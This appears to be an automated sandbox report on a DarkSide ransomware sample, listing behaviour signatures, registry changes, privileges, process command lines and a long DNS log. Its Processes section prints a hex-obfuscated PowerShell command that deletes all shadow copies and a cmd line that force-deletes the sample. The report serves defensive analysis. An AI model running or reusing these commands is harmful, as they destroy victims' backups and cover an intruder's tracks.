Malware Analysis Report

2024-10-16 03:30

Sample ID 240806-mkfahaxanq
Target 2b2aff0f96023927c709a40c979612bbf123ec59478d7f91a06d25e55f98460b
SHA256 2b2aff0f96023927c709a40c979612bbf123ec59478d7f91a06d25e55f98460b
Tags
darkside credential_access defense_evasion discovery execution ransomware spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2b2aff0f96023927c709a40c979612bbf123ec59478d7f91a06d25e55f98460b

Threat Level: Known bad

The file 2b2aff0f96023927c709a40c979612bbf123ec59478d7f91a06d25e55f98460b was found to be: Known bad.

Malicious Activity Summary

darkside credential_access defense_evasion discovery execution ransomware spyware stealer

DarkSide

Credentials from Password Stores: Credentials from Web Browsers

Renames multiple (146) files with added filename extension

Renames multiple (166) files with added filename extension

Deletes itself

Credentials from Password Stores: Windows Credential Manager

Reads user/profile data of web browsers

Checks computer location settings

Indicator Removal: File Deletion

Command and Scripting Interpreter: PowerShell

Suspicious use of NtSetInformationThreadHideFromDebugger

Sets desktop wallpaper using registry

Browser Information Discovery

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Modifies Control Panel

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 10:31

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 10:31

Reported

2024-08-06 10:33

Platform

win10v2004-20240802-en

Max time kernel

121s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (146) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Indicator Removal: File Deletion

defense_evasion

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\0b553531.BMP" C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\0b553531.BMP" C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.0b553531\ = "0b553531" C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\0b553531\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\0b553531 C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\0b553531\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\0b553531.ico" C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.0b553531 C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\Darkside.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Darkside.exe

"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL

Network

Country Destination Domain Proto
US 8.8.8.8:53 securebestapp20.com udp
US 172.234.222.138:443 securebestapp20.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 172.234.222.143:443 securebestapp20.com tcp
US 8.8.8.8:53 143.222.234.172.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 71.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 22.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 99.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 11.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 21.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.1.127.10.in-addr.arpa udp
